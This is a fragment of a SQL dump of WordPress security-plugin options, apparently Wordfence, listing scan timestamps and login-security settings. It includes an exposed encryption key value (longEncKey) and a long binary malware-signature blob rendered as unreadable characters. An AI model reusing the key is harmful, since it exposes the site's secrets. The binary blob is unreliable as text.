('lastBlockAggregation','1723448237','yes'),
('lastBruteForceDataSendTime','1715774263.452900','yes'),
('lastDailyCron','1723448667','yes'),
('lastDashboardCheck','1723448668','yes'),
('lastEmailHash','1723447766:f5b1117047d58ae8309137527e9e134b','yes'),
('lastNotificationID','916','no'),
('lastPermissionsTemplateCheck','1723492768','yes'),
('lastQuickScan','1723477078.2944','yes'),
('lastScanCompleted','ok','yes'),
('lastScanFailureType','','yes'),
('lastScheduledScanStart','1723521057','yes'),
('licenseType','premium','yes'),
('liveActivityPauseEnabled','1','yes'),
('liveTrafficEnabled','0','yes'),
('liveTraf_displayExpandedRecords','0','no'),
('liveTraf_ignoreIPs','','yes'),
('liveTraf_ignorePublishers','1','yes'),
('liveTraf_ignoreUA','','yes'),
('liveTraf_ignoreUsers','','yes'),
('liveTraf_maxAge','30','yes'),
('liveTraf_maxRows','2000','yes'),
('loginSecurityEnabled','1','yes'),
('loginSec_blockAdminReg','1','yes'),
('loginSec_breachPasswds','admins','yes'),
('loginSec_breachPasswds_enabled','1','yes'),
('loginSec_countFailMins','240','yes'),
('loginSec_disableApplicationPasswords','1','yes'),
('loginSec_disableAuthorScan','1','yes'),
('loginSec_disableOEmbedAuthor','0','yes'),
('loginSec_enableSeparateTwoFactor','','yes'),
('loginSec_lockInvalidUsers','0','yes'),
('loginSec_lockoutMins','240','yes'),
('loginSec_maskLoginErrors','1','yes'),
('loginSec_maxFailures','20','yes'),
('loginSec_maxForgotPasswd','20','yes'),
('loginSec_requireAdminTwoFactor','0','yes'),
('loginSec_strongPasswds','pubs','yes'),
('loginSec_strongPasswds_enabled','1','yes'),
('loginSec_userBlacklist','','yes'),
('longEncKey','7bce099539fc5951c07a3d3805a636b25935dd056ec5e1627cdc56705946e36d','yes'),
('lowResourceScansEnabled','0','yes'),
('lowResourceScanWaitStep','','yes'),
('malwarePrefixes','�\0\0\0\0\0\0�y8�\0�ٗ�Ν;˽sIYJ��BR$RI%Q�D�ZHJ!I+�J��H����i!*)�EE+�&~����y�y��3��3>�nj�\no>^��\'�_wB�x�1�uO�\Z� �%�e\r�?�EC��)���M�>��8)��}��uׄ�-X����1ff��m\0��\0��\0�r�a?\0xG7\0?��)��`��\0�4��D�K@�bH�\0Y�+ gZ\0�p\Z������\0��@1�Pt���180�\0�v6���. �);����ռ\Z@U� ��{\0u���\'�����@p_���F��\\q4��\0Z.=���_��\r0h�����t&�:A��!��\0]�߀�\n@7�\0��b?�g��]����;�a�l`�,[�0�`��`x�,0�`00��a����$`d�0Z�U\\\0�>��K>��&�)���/��S5��)�;0����r��= ��7�?�����`\\C`9��*XXՐ���d`��~`�6L�XK�֗_�W�6$`�����t��t/�<$p�8�7�O�\0��`�m0m��.V!����kH,�\Z����H�f�~�x8�9�����u��6~����\\����\\�`��w�<�:`^s0��\0,?\0,H{\r,8�,(N\0\\Y\0,��x,�x�\0�cO�Ӏg�#`��-��u७xx�s��/�]�\0,�%|����l���0��,���Y���g�8`����р�����]���C��\'v\0�k܀\0�& `O,�: X��&\"@`�H h�4 8Z��܁��s`��I�\Z0XӺٛ�A@XPv�/6\"�J b�\Z \"k\0X���:��\0����Q �U5d��DG]\06=]ln��X�[V�@�.�E�����$��������.�-�ض�,��; ~�j >��N�u灄��@B�#�8�H�7H|;.v����+�$� i�?�s� �+\n�� ؍,v4{���f7�g�o`��>�w`��^`_�N`��R<�)A��=��q���R M�6�f0\nH�/\02�K�g; �c\"�9P�0%k��Ӣ���@��D g�= �3pdQ!p��4p�Y�����@�zs �����p�N\Z�\n��t_�T�p�[B�@��I�p�m���\Z��=(��n��1\Z�Y\Z{���{%\'F�|�\0�*^�&�������)���@��(�2(OR���˧���w&W��\0��`��m=P�2��@��k@�F�:�P}��|���7:������S�����[9Z�]�r�ә\0�5G�f6\0�|�}E$p��@�x�xx8�2���/��4h�txt��8S4�π�cÀ�Q��G������^@��6�y� �<xaj��\rxi9x9Y ��^���^Kږ�m�b൷=�:$x�1x;r�)Юc��\r��� |hK:�́O|�ϻu�/���o�����]��#�[�?�@��@�����=��\r��_��Ǿ��U�����7c\"�oN)0��K��K 4M��?�Ч� |�c�@ĺD���h�-�/1\'��q�ĝ��x��x6$/�E�.���8(Z;]�ˢ@��@k@��$P2�����[߀2�hP�u:H�D�T�3���@f�\'�{�� G��ܺP��\0U�AUR\0���������~P-�E���n8��Uj饁Z��Z�|A��M��~!��Uj?�j?{*�\r���:��A��-��vpp�)8D��W�Z;�������@W��h��84-zq 8l�0�p�4�N\r_[���\r�p?8�X����\Z}M\0�]A��;A�� ����@�8����.8\Z\\��}�Z����� м��{*gp�b8��\0h9v>h��h�5����JN\0�����@k�h��\rh}��������lmN^m�A�oE��/�@;�~��U8i�?�>&��/\'?O\0�|D@�@\'pZ���z!�<�8=�]#~�3g�3�G�35\r��+G�Y�n�n����_A�����!8��X����yE������������\r�$%�!o=��=Ꟁ���g��p�\0��/��y�h�ApQ�\Z�K���:R.��.���n���烾��K=��G��K�T�k���e�W�d�+�OW|��7]W>����G0آ��4W]\0W�X ���{0���?^��X�uǀ�#߂�������!��M��u+>����o��Q>���3��F�4���\0�^5 �>� F>n���\\]�< ��\r\np��Lp��+��Vf=�u�7�m�2p[�Wpۉ}�\'0nb�����\0����I�`,p;�Ll��6��G��X)���&��\n&�?w}H����{{������=\0�߯�*S�x��-��e�`ڑ+`�r0�\r�>hxp�D0�[=���*p灇�^\0�R�lU�ݞ\0�\0s���1��c/����U`�\"3�8_R\n��̛�\0�5�������12� y6X��,��<�x��9���*XX�,��`�3%O���M�Y+s�<�&<��\r,60K�@��0<��0lX��e�3��J�B��0�+�.+�g������)7�gxy�E��\\��H��+��FE�W����o��?�E<���k�C���9u���5�����,���ޮ�o��wu�w�^�Ƹ������\'�����Р� >\nj�\0}qw���=�`S�=�-�{(�\'o��i�$l���-#g����/����_�$�//Ԃ��+�W�?�����u\0�� �s�ߵ���z����{�^�C��ct<�1<\0�v�����m�ON�����s��ۧ�O/�� �����~�U��>}8��X v�]�:��X\nv�{�D�{�N�?�1���b��o��2_�W�v�W���u6���\Z��#����?�0����k;��W; ����47C���p� #���\n{�0\0�v�|���!�b9�.y� l����1��m#!r�\'��\Z\n��!ѼXH�%�:+!驫���[Hfɾ\\��SŐ��-D\ri���\'!���h�)1Rj/��w, ά��!�?H0� VG!a�$��49� �wA��4_HG{��O\r��\r�t��<��{\r���˟�}����W���wo��@C��A�ܞA�|A�J�a�� Â+Ј�5��Yrh��#���\Z��\n2�%!�Fi-�F�F\'��L�4Bcd%И+ 3�dȜ\"���]��-��8�$Ȳp*dY�BV�@�\'�C,t �$dm�MX�� ��k �����E��rHQB�sS��iِ�hڪ����7ȹ�;���l�\0��\0M\'C�h��.�ճr]=r�r}��5*�=�$4O��_< -��<�C �$�IxA�s]���4h��Bo3h�=Z4|=��+���Sȫv\'��y�ZCK<�AK��%ի!�!� �x��}����\Z ��� �7w����OfB+�\r@+ch垅�ʻá�o@+{C���P`�;h;Z5�Zդ�����\"h5�v7�V��B�/�Ck��\Z�PH�(t:��_����d�(��!��;�~�h�R �,� 5�brnA��VB�+>A[��C[w|��,=�I$�03J�9\0%��\nm�j����Ў�(ɴJ��%m�/�%��\n%_�vM�\n�����q������OA)g_@)/ڠTq%t���V��O|\0L�� �\ne��A�fYP�(����9O�p�y(kH�k��CG8tdit���ȓ�(g��{�k _�\r?~��ʷ̀�#G@�C�w�C\'�_� ��� �YЉ�[�����*�Z�j} �B��CE�T�9*�>*� Ag\n~CŊ�Pq�*�?*)̂JN�ι*�sw�C�cʠ�p�|�7t��T��2T�AW�A3��%/ t� UM_U�q��n]]M�B�G�k ��k��C5��\r��P�Gts�c�L�X��9\0�i��:� ��:�ݏ�������z��j=��5n��\'BO�@����@��uPwj3���%Y�k�\r�z��M�z�mrԾ9z���q�����eԑiu�\nuz��:�ʠO�Z��~MЗ����oз�F��N��r�� u�������{_�ks��3zPoU�s�m�g�aWA<R�>�{п�l��F���a�4���q0�z�m�`��F��u�w���`�&�/Ä�r���܂I`L�������(� ����[KM�%\'��Kɰ�,\n���e�?a:*��_��F7`e�V���&0C�`N�s��`��˰��qXX��ΰ�t5,4�\Z�dX�Ck���:\"�u|&�:m��Px��}>���!����]��{�C�����0�<��6t>�<\0�4�\0���9\r�`�Ol\\k �|��M�Y��^���$6w���h�-���V6k`��E�x|�=غ�lS�4��m�6¶_��R��ė�n�>�~�!<9�v�};\\4�\r��S�o���i�Ӫ_�ӞR���(�y�\rع��B?�]��*��q� ��gN�\r��0�gfn�g��nR`�����b��xN�<�P��=�w�/ج�=`]x��x�>xѹ��W�?x��}x�[��.��|t�}F$����qx\r��0��Px�����C�e�xxY�jxY�+�Oo�U �����\r��K�a�����g\r���\0^Yp� ژÁk���\Z��`>^=���E������}A�a�p�[���mሳY����p��y1 ����#�o�Q3]��8�t�1��1�������l�!���ǂ�������;x[�(x�6�sy\0Ǐ��W-��__��;���hxǑ�pҴhx\'��>��v�#��y��;�8���x_�{T�I����S��q�k��C�7��4[N[��_n��o����[��\r�s78c�6���g� gf���K:���#�M�>�Q�>z�>f�>�L�yG��pޣ�p���� \"\n>�p>�>�� ������,��;§N��]Y��E��\"�H�̰��ٚ��mK��..Yu.�9>�r|��<��.c��S���\rp���!p�m\\u�!|��1�Z�%�&g.|��\r��µ�p�v����-#�62�ck�qk����u��.s����We?�q�<�����m@�>�n�7�o���Ï�V�M�Z�ǧ�Of��ͻ����g5��w���~Q9n=L�/=��W+��W�?�U���H����^�]�-��߫w���6��X���F��;�~)��o�5x*���o��Mg��w�r���\r��ow��w?6�{\Z��=�s�1��ý:���˫�_�#�_�\'�����?^��K��#�_��p��?[<�\0���>�\"@�n�>���7���So#h�}=���D���^q!�D<9\0�ND$�!��/��R��9!����&��MD���u$B��O�#J����a�L�}؊p�o���G_ �sW�ND��Q�G�Dxv\nѲ��hE� Z�m�LD���n_�h\rD�� ���Gt��Ct~5\"�����ŝ��oD��D����G1�{��NF�>�@�!��!�1�����\\w1\n�@�֚\"F}��v����蟦��}bڸ��\'2f�>bVe��K& �^o�]�\"u\'2����[j��������X*G#��g+ub������� �%Ґ�u}��\\d��aȤc+{{ 2e����q�{q(�F�!N:��i�a�yC�c*�|<q>�q�rq9}��<�^���� 2���Պ���%�Y���[�7�1�3�\Z2����j\"2�B\Z2��)2�������3�D�﹇̯Z�,��x��!a%�g��s�x��,ܾY�!^��o���@��#KjZ�� �R}Cd�U���C���2��h$�g����A��� +N�B�UYH�*Yٽ \\� ����F�m�U�?�U�4�(ІǝE�O�BV��EV7C�Lđ5G� )X��N[��֤#�KA$�Zd�n�n�sd�\"Y���T�l\0��h�$:�]q�q�G6��Ȗ)�ȶ�Ñm)�x�j$��$,Z�$���$$E�����w�7J�$�,$�\r�s�ٹ��|����\"{��!{�u���W {�#{?mF�]@�Sϐ��> ��� )��\")�����\ZER��CR�7\"\"� �#i[� u���$$s�x�и��a�.�pb3�u�E��: ٽ��{��������ȱ��H�6=���!yb��J9y�9Ym����i�E�hrr��\0r&�\n9S�9k�9;�3r��R<�)��EJ�,�s}<R:�7R�>�P���͡���gH�D����8����rI�\\?\Z�<�B.�!W^k#��� �w�*�&�*��:aR�%�NmDj��Gj�n#7:J�Z��H��H�o䦤�َ ��!���QH]�1r/[��{\'r�-����4�#��U\"��5H���)�G{�ȓ�7��{���ޅH�ȳ,K�e�$��1�¿yy�yE�!m�H��8���\Z��e�&Nyk�y��yw�y�ꁴK;���H{m?�8��C����\\��v�=D:_�\"�V|C>��@>�8��B�,[�|)�B���@��.B���|�ь��F~���h� ���ހR�7��-���4{��>z�}���U���@�&; }K�H�3���� �_p�o�������(��\'\nu���: E��ʛ(\Z�Ek�(�tBq�(Y����EŢ�ش��?�ʮOD����B�3�PF/e>c(ې�r#�P��pTs�d5ܨA�<~���P�q*T��/��2��ߠz�P��RT��7�?�F�����٨�Aj-B��CGOG���I�q��:�l�LP�f��Q�C�PB-���]j��5:��\":�7�\"j�\Z@�\\�Va7��{e脕��5�����c�Q�}cщ��>�N�ǡ�uPǙCQ��:�T�g�i�xt����=u)�B]ζ�ӱ2t�z=�x:Ct�ɖ�n���[e;:���Ξzu{ �S��[��뚌�|�.0��z� �{�zT�.�=\r�ђ�>�E�o���6����[r�k�DW4�E����������Е���+=�+�`te�>��ڄ�JnD����գo��/;�!cס�ޛѰ\'4|G,\Z��]k�]?�-�!x��\ZI8����\'�E7��\Z�i.B7��E7���/1hlc9�5e\Z�*G_� �S��_���/��[Sѝ�5h�Lc4����%Cw���nE\r��>�}��7n�o����5��wM1�@S�mBS�X���BS���G��Ѵ}Uh��z0V�f�|�f��@3�բ�l|��#���\nѬ1uh֭�hV�4g��M@s�\"М�X4�e(��a$z�d4����-�E����(F�3t�|��h~�4��=qFO��CO�m@X-ЎEƬCN�FO��BO{FO�?��$�%������Z�B�0�L�\rZ�t-�u-+�������G/�e�W�����\\���U���U���aNh5���rF�+��k�k%��{��k_����X�z�bZk�֮qBoR����^���z�v�(�Κ����}��}Wz?&\0}([�>\\��>�h�I��a�6��G���h�m�T�>��G��u�S���3}Vb��씢-���w�G��9���z���Or\"��5}5�}e݇�Z�}�}=� }=���Q(�nrm��\Zmc��OtE���D?��G;l�G/�c���,�v�}B?�߃~�<�\Z�~i�F�jMF��_D��F���F��\rh���u���ȣݣ���C��s�ў���/�ץ��F�t�B�����C�!S�T�o֍�G�@�3�����\0R���O0�\Z����cX{������_~?\r#�]0��;��v�D�yLl���}�0�lLb`�I��b��w1ن����Q�y�qS\Z�ĸ32�/?��j�b��N�z�-L}�S��a��S��O�5����i�b�U�0�� ��Ssl�n�{ Ӄ0��?1��W���I���H���SlhB\"6,~\r6�[fZ�\r�/��_����*�F����[�O��5���/���� ̴&c��/k�{�663\Z[�g��T�Y�,�1��l��Ll|�-6a� f3�/f3�f˿�l�1ۨ��������$�6��6i���Y�MY�M)��9�a�m���a7���C�i�6�;�2s�Ha�?����،#��Y5 �&�ܨc��n̝s���gbs�+������ߞؼ�7ؼo?��6�q)�\0��-h��<�as�1��=����g�R����[�S�y��Ńa�������%?�`>�K�e��a�&]���b+z���!�����tލ�|5|q|{[5e4���:��\\��g$Bta!�����X����L�ª�`�g���ᳱ�uغ��u�؆ǽ؆g�\r_���]�X��X��Xtq>��܄m��m�mN8�m>t��۲��=����Ƕf����Z��I\rX�x�p=��K���m��a�U��*����x;K�%ݷ�v��Œ�Yl����b��plϔ5؞��ؾ���Ik��LK=i���.�\'`��ð���X�����4,3x\rvh���찏?�e�˺n�e�b�i4�c܃��;�N��-��:���c����<t�\'��婶byw\r�|h!v�; ��N���?�\nDc��-��t�`E�qX�u.�&�3��ؙ�u���,V�JNJ���-!Xɡ�XI�e�\\�F�t�9���+���J�i��꿼%��D��u��!%V������*n�*���KZ�إo[��z�ؕ/Xe�n��;�]�f��?n`�mO�k\'7b�\rcח�b�o.���\r�jb��={����\r�U�\r�c؍;؍�X-7\r�}������ �]=����!��:�Z����%��ѵX��9X�%�5B_�\'�]Xs�%�lt�,<k�V���2�Z��X�3����b���c/Wb//Ea��-��0[��7�w�����g�}o���>��ľ*����X��j�+{2�]���,�~G��ҰQY�/,��\\������vZ����?N����#���H�o�B������,��܇;q�������\0G<�q\\�\'M\'��q� \\rk.��ҟSq��hj�Y�h��ӊs��qu�F\\(݂kt��\Zc�m��k߶�5�:��:�p�\rJ|��>d�5>d�[\\�R���z۾�z{�p��6�~�]���i���B|��>��V��Gtō��q~n��nrt=>*�<>�D%>��M���O�t`�]���8��ռ�͇|��m���,n�m�[���p|l�;|z\n�<����Oŭn���u���=��w8�v��\'T��mln�6�z���[�M�-n� ����]7�v�zp�w�����`k|J�O�?w[�;M���;Mq�#\r�Ԙd|jZ��݅O���;��]��K�>�0�n������0�g��g�E��\0O|Vw%>;�\Z>��7�n����,>��5��>_�e/����y���[�/�؏/|�\n_�q�z�{u�^\Z��0�vƽ/V�>ǃq�O���K�R�6|��2�����\n�)���S���kp�\'^�ʐ�x >_�%_�5z� �i��^p_�p4:���}_�����ã��Oj�{3�O��u���:u:�a�y|�� x�uxd�<�xYa�G��7\ZN�7�Gs���?1�&�5x��g<&��y�\Z�i��o��|��ee4���6|��qx�j|���zi(�m �����^��4���t<���a<�6|G�G<�5�s�|g[%�����;O�u��W��2��:��2�h���5|/��ﻢ��?�O ��Sҏ�Z��TO-����xz�&��~~0x%�1E�g,��3�� ����OxfC<~ȁ�-X�d���jO��/�ŏx�ŏ\\{�y4�E��5�۞�� ��ʇ�ɠ9��T/?/�Z�\\?����৭��wO�O�i���Ow�ƋػxQ��]n����b�\"�x�m�������a_���e�y�?~��?� ~��+�|\"�_��_v��_� Ư,}�Wj���V�U%3�x���x��>�:�~��=~m�0��yc���[���j���\\���8�51���9,~SӉߜ��o�X�w5;�C��s����Cx�pk���!~��o���P��,8� ��8���e.x�*o��𦵾x�f�i��T��7ݚ�7�1��,�X�?��?���:��l��7�[���/q�_�����x��u�-���N\0��q��ױ��q)��t[W���.�ߗ<���?<�;|�Y��m���z/�϶3��gS�/M�g7�_{,�o��o���k��]�\Z���.�gw6�ê�q���f���k�{7xo�a�\'i��������]����>Պ�~х����?&[��߁�x_���;�*@��1�_������r|��A�_G��0Մ\0K)zw�@�?��@v�����0���N?�B�h�04\'�-0!���$d)�Ur��w$�&;�Cl�g��7��p]����| >b/���*^�Pe��0�0�y}��\Z�Ch%7ڃf���_w����`b\"1x�b�h11DaC�}%�\ZD,aP3�Z��VSE� \"�� ��;N�x�K�$�#i[b�H#���C�x�U�Dv�01�!F�F�ѫ>��i�Hb��EbLT\'a��DX�{NX|�N��~B�������|K�/��y\"a9O��|�OX~]IX�|$��� �� ��� �/1��a����A�})%� ��΄��nbʃ/Ĕv�C�%��IL�wS��SW�N6���#�ӷQĴ� g�넳�+�\\H�\'\\FU.%,��1#p=1h&f��E�\"�Y\'r 7�I�۳�ۛ��ɀp�v\"%� Ĝ���pb����T�[��� �6�S/��t]Nx��$�����/�c����X<=�XbA,~����J,��$|�W��|���X*�#�f� ��K��K��\"�t��; �\"�)�X9d\Z�.�l�H�k�5ïk�̈5��� �D�R#\"���$��fO��� �R�:v��XKl�\\DD�WQ?k��E-Ħ�@bAl�>Nl�2��]1��ݿ��Zt�ضÜ��N�=o&�������D��ED�d5�4̄H:<��&v�F�#��ݏ�=6��=������SL�\'܈�+܉��ډ�)=D�c��6�8��8p�-q�L�f��H��D��F���#������yDz�a��Տ�!��8dHr�\'�`k\"�4��i��#�e�������ܡ���\'��Z�������o�D�f��s��_<�8��DdcD���#DѴ�D���(\n<Ou�g�AD�K�(u\\B��O��7[�O�\'.��&.�ڏe��D���WJ���r\'����(?���辒�X�M\\|�\'.�!�*�)Q��Quh(Q�����d��`F�W7�\\��p Q{ً�9}q�&��ekEܺB�>����BM�gN�Y�O܉xCܩ_A���M�cN�\'�Mk���)�}���w�r)�`�\n�⡍-�oQ����7��oL&\Z��DC�\"�Q�;�Ԛh|YL<Y�A<�I<� %��!�-̈gCY��9k�e�q�%-�xA���@��$���xx�x�y���������O|\\F�D����ԽEt.J|�6#>��Ӵ�o�i�7�l�KGt��\'�|���Ӊ��w���3D�H�@������op�G�����ӫE��{}?~�ӟ��S��>1�p�x.%��/H�� a�h.V���Z� 1q���#q��/�AGW���s$ ���9�8����6�r�S$�֏��= B8I?�#�3��?�d\Z�Hvh)ɾB��y$簞�X�\\i3�:�T��!�)<�Oj�=!5N�Z�$R�\r�5�9�ZI�\Z��މ���$��/�%���\"\rRQ� ݚ4�+\'�-�A��HC>�4�O���}\Z9b�r��Nrd�0r�!���i��I��i|c:i|k7i\"M�F�&��H�2\'�<si�֑c\'_%ǥ+I�ѣH+�Xr�d9^J���K�lYO�6&m�� mg����oH�5���D9�UM:�yI:��%1�q;HN�YDN�%���MN��FN˯#�w�Ω^��KN�I׳��W�I���Hw�c�{S���#i&�LyD�)�Nέa�y��<��g���4ҳ���d��ą\\d�D.*\'��<H�䳤ס�����}�b߿����g�Z�W�N��!}����c�ҵɥ {ȥ?-�eeKI?ă\\fN.�@��C��N�hM\'�]�ɀ�ɕO�����:r��䪿��`�?�j#sr\r�B��\r C\"2��w2�ʜ�����2\"4��(|L��/%�>�&ו��u���G�Lf�>O##GF��n�dd/FF�S�(�K��u�ȍ1��h�2:y4� �#7��Jn��On*~Fn�lDƬLƴ-\'7�;DnNYOƙ�\"�m$J��č�d�ǟ�5�ɤ_dR�7�3$���d�drNr7���#&�ɳ��B���d���-�Εd�=r��9�)���@f�U�Y��dV+��n\'�S��<�RF���c/=�\\��\r�K�^}H�E���k:O�˴�N\n�d�+Y�$Rk���#�Ӽ-y�D\ZY�� ��~&�<�!�-F��`#�ynZ\"y�Y��C^�M!/�m\'�&\'˶=\'�l����r�J�<|-Y~�=y1MNV���KZ:䥩/�J�Gd��=y�`y��Y=�5Y��IV�o!��:�\"%y��X�f�+YS�Jֺe�7�N�7�k�[����M��<$��{K>pJ\'\\t ���Cc���ai���U��{1�8M�l�-&�n�M����.���K��o{�\'kޓO=��fY*�l�O6O� �Wo!��z�g���g���g_Ed˟���R;�����6d��5��|S��|�=�|;��|��|[��n�!��\'ۯƐ����k��5=����ò���0���QD~6?D~��N~9���RJ~[�����]�F��x�]�Mv?u&{r��^��h�_�J�W=@���D�b�?-ɿV{Ⱦɿ�~����(�����=\"p�U�R.��d��m\"TvPDL��>\"���Hlc.�z+{��k(�|�8���Q�X�F�xK�h�\"fZ���u��oD����\"���\"��f���ע!;4�!�BD��H�ޝ_\"�g�\"����a�\rE�G&�F:o;���/2~�/\Z�A4vm�hܰѢqwA�xH\"\Z?\\#�6�!��<Ed\',��M��M.s9��\"G��\"ǖ]���Ѵ3�E��D.������D3�D�f���.�#ro=&���,�;s�hޠ��yCψ�r�yg�<NOyt��Z�-�(ZT����gh��oF�|2)�O��ȧm���c�h���o������h�\\sъ�?\"���7E+�lD+?��c�EAC/��T�¾6��o.�w����\'Z{�V����hCP�hC�ц*R���^ѦnGQL�B�9��h��x�(��B�x��( >+��yR���H���h�����4����D)!٢����W���Nj����sg�>>/�0_+���-�x�&:4�Ht(c�(�B�(�)T�#d��HmDGM\rEG�:DG�>�r���n!:��(��Q�;щ(mQ�h��p�ZQѲ����zQQ�P����� ��k�D��D���JF�J�f�D�D*kEe�V�ʂD凵E�gBD�3E��DWf�U&鋮n�U��D�]��Pt�n��F�#���,��Ɖn~��28.��݉4�Y������E��Q��vQC�R�h�OQ�讨)�X�T0A�8K*z�q5+5\'E/b�E/�^�NX.jm�,zy^�z�,j��)z3h��M��[�\n�;�4Qǖ���D���>/[(������BїD��䑢�g�E����E]��D�7x�����(����o�}Q�&��߃6ѿ��b�J,F&U�Q�1��(&���]bQ��X�%K��˶��eّb�l�X��],�8-��2��X1�\\�?��=ż�\"��d�X��F���V���G�����JT<t�5�P� bC�C<|��xD�\\�����#{x�Q�\r��c�Y�V�Y���j��ت�C<��N��Ubk�Pl�Tl�$���X<�/Wl��J<�@�?�S�;��z�b�6b����O��.�����e�l�t�f��`�ص�P<kU�xֳ/b�=b���b��$�����9���]k��T�=�b���ۗ��-^��P���K��Fk��E��K;։����W�m���A�_�)����Ł+~�WI�ūj����8��tD�Cg���4��έ���fq�u�x����M�v�M���c�q���x��\\����-���qjSq<tC��$�|�� �����\Z���wz4��K��{!�ޖ.�ޟ�ũQ��j�i���Ӓ��kO�>Jg�gi����֟�#마�w_��>�]\\,>�(.���*>e(.{G\\ء�9���nr�nĥo։�ƒ���C�/�}W*Wĉ/{�/o._��#�R�+�ڔ ��;!��m-��H|��qq����V���[Cķ���w�n�9�U|w�����(~��P��%~�c����hq�%\'n�w7�M7|�7\n�ō[�M�:�\'���`q���[��73�/���_4:�_������ŭ��6�G�-���Ƈů���7���M��;�������i����x��+ğx����)��kş������d��o���[]w�V�{��{>6�l���?:ſ�X��&��AK�������\Z$��r �.���K��%x�c ��XB> !Z7HHi���X\"\"~HD�$�[�%bm=���(�]�0A\n {�O�r�(Q�s���� ����d�\"�d�2�dІ\'��F��Ɲ�x[�n�6�^��D� ������]%C?���[\"1<m.No������sIb�{Eb����X2ꌣdT�Q�h���d�d����%��=��������$�G;I&��Jl�^�M�����l�]�3�}��d���ွ�q�\'�T#B2��L�4<N�t��ĩa�dZ���Y�Ĺ����dF,���df�nɬk �I.���wK�`$�d��$~C����J�GU�d�?�b�g����$�KgH�_6K��I��DI��<#Y�<X�$�[��+�Z%Y�͐��!�o��Lϑ�8IV���\\�J�n���\'Yg+ z\Z( zM�fe�d�뽒5?�%!��%a�֒��$I��{��G%�Iă\n�Z�,ɺ� �h|�d�\0I6�����x\"�um�l��J�^m�l�+I�&�iGHv��K�O�H�x{H���\"�;��do� ���%��J�ǙHR}�HL���͐��}-�P�K2I��r�l��$��Q���Prt�Xrt�b���L��WI�\\�e�ܽ��ŀ$�i� }7ɉ�풂�S�S�HNeސ�:�Lr��!�ٙ�$�>�I��%�n�$�>*I��U���%e+�$e]��\n�T��\\��_R��Hrm���^�[�o%wxS���%u�:�5��]�{�s%�v~���X�w��Q�9I�%��vђ�ےg�%�#s%ϯ�H^� y��K�b�Iɋ��ˣ�����%��\r��ݳ��=씼��,y��I�ﳔ|0�|�^J>Ŭ�|�WK>7��|���|��&��3H�m�Hɷ�c���$�o��tk�Jz�T��;��3K%?�GI~<(��m+�*xzI\n٭�BSl�0u]���I i�T$K��O$KeC����R��ER�/I�^���\\��;-՚(�ZuK�m�X:\"w�tD�?�ȩ��#�äF�¥&`�t�K:J�!5�t̆*��k�f���f�{������R��/�.W�wJǎ����I:6�P:��Uj͍��$��ڴ�Img���6<���H��v߂��F�K\'���ڏ�#�V,���J���S-B�S[�J�fܗ:e�N��i���\r����Jg�:*u�v��礳����G���q�)��TJ88K=��)C�-FH��̥�O�R�d�Ի�O���)�m,]v8P�\'�����)���&�K�-��\Z�����0Ĥ����U�6K��Z���&i��9i�����\"i�{�4DV#\r�,\r�JCu�IC#>H�^n��u������F\Z}�F:�ҨS�1�^I7�I�Mɔ���҄�;&H���&WJw��.���]���]�\"��m�I�?ɔ����\\���֔J�W�K3�͐��fՌ�fߴ�u� =z���w�I]\\z��3i�*=5��l��l}�����ܺ��cii\'�T�-��TZ�&���!��\'�Kz����փ���f��;K}�u�qҺ��{p��ޥp�a��N���f��G+\"��5Q�ƺ�Ҧ ��\'sNJ��ߔ>��Q�����i�%i���疑��ofH_z�Iێ�J_[����%}kH�v�K̗߭���~� �ؽM�y%B�i�Z�Y�K��6X�ua���?��T��{�ni��_Ү\"�eC��i�Fߕ��/��*�!�Gڏ�G������/2�J�~<H������e�3s~AK&�I����D\\.���eҀ-2�i�L~P��R/�ϥʘrL�bd�K��u?.c�ۗ3d�O��q�2�v�L���L;v�lP�t���8�`t�lpc�L7�L�j��l�lh���0�D6����V��x�M� rG6�5��>����$35��>��=L�Y=�#[�,w�Zf��� JG���p���|�}�h��|�lJ�\'�c�H6m��l�I��u��l�e���d�*@�[�B�<�D6y,���$�?>L6�\'E��F�9�X��Z�0��{�v�w�6��b��H��\Z �ÿ��ɖo�+�m���_���<�d�\rͲ����gd�dk�:�uK�dd��?e3�e�;ɢɢO��6�.�Ŭ�/۲u�,�0Y��(�v�]g,�\'�e #�e ˶{x����wN��D�T�K��]���R�g�z��a�d{�\ne�}���)�����.;��Bv� ;X�\";X7D��;L��\'Yv�=U���#9��cV~�c{]e������>���e��e����\n�<��ܕ��&;c�(+���\\ ;7���gmم�0Y����� ��K��s�Wv�.Pvœ�U��ɮ��j���n���z�dw�\'�ꂞ���Z���e�������ϔ=l� {<�]�Dy[�,�)k�t�=KY\"k!\\e-�]��Ke��!�K�쥱��e -{�Y��<B�x��SZ�&�Q־��Cg��Cv]�IY.�l�%��V.���.�v{����%��kd��rd�}5�?E�������oe����]2��7|�\r��F�n�-G�F�Q�09N����p9~�RN�,\'~-��n����E����%��\\j��e���yrqGNXȕ��l�69{\\-�I7�`\"�>��k�W�5��u��N�x���9r�{����A��ܰ�|��-��#o}�M��s��&���G�d�M���M�5�MK���j�f?7��\'Q��e,�J��[�g�\'x�[w��m���,�O���r�1���/*w:yL��q@>m�E�����*����rW�?��9r��k�s��sNF�����{��/�\Z*_�tY����[�ܣ\'H�b�ܳ�H�(E_�(s��˾@�u�Z��{��K>��/�5Zx�A|�B|�|�]N�&}�<��7y��9y��#y���<\"�|��y�n�|�LG�Q1J�q�<:I_� �4w�|��t��?�|�X��~�<n�yy��v��Hyr��|ׂ��]���7�����4��u��Sޥ�S%��ź˳�˳o�g�~(�>�[���<��H��0C~<����O���G��M�E�c�E/��+K�g����ɋ\rS�%������ez��\"/G~i����xye�y��iyu�b�����\Z�&�͆J�́��[�\n��6���C��|��ߖ�]�?�a*onʛ�C�M5�gf��g�_�[�Y��e��m����-��W��ۻX��;��C3��U��-i�OZ��O˝����?}��Y>X��4#��4Z����\0 ��З�z��ޝ��?����*�{�O�W�.�ם.�=Ae��J!�\\\n��P�P\n_D�/P�h=�|�\"��Q��)�Ŕ8`<%��$�!J�XJ�l�)ٵ����9Jn6@��\r�(AQ��)��H���G�Q����S����ӧ����C�(.�ŵ�P���R�\\K��#(M�bJ˚����(�7���M�X�RC�PC�\\��<�N�θB�}�I�3�)}�`�\0~F���SC��Q�RjX�=j�/k�0{65��5�b5�Q 5�\ZG�|]CM�M��(�K[(?5e�s�\Ze��\Z�ZK�~�F�1\n���%�ٵT�|�y�b=H�=}�\Zg��\Z�b+5nS?5n�>�j�\reuv5�~e�̖����l����ć�����(;�]X85��e��2�5eLM �C9�YH9�l�z�S������ʩ��r��E���Q.��)���)����t����E������W_)��<��aC�x~�����f-:H� 